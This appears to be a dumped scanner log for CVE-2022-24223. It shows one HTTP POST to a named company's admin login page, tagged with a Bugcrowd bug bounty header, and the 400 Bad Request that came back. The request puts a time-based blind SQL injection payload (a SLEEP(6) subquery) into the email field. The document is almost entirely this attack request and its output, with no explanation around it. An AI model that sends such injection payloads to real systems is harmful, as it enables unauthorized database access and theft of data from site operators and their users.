[CVE-2022-24223] Dumped HTTP request for https://techsolutions.bitpanda.com/admin/login.php


POST /admin/login.php HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

email=30rudieBaT9ENaNmgjjXlMcnunb@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password=30rudieBaT9ENaNmgjjXlMcnunb
[CVE-2022-24223] Dumped HTTP response https://techsolutions.bitpanda.com/admin/login.php

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 11
Date: Tue, 05 Aug 2025 12:53:23 GMT
Via: 1.1 5d22d4cd27d82c133b77117809cd93b4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0lKyMZ5G32tAwwHtI9l-kYO34kATLApU6awkEQ7RVkUPm4riAL4_RQ==
X-Amz-Cf-Pop: IAD55-P8
X-Cache: LambdaGeneratedResponse from cloudfront

Bad Request
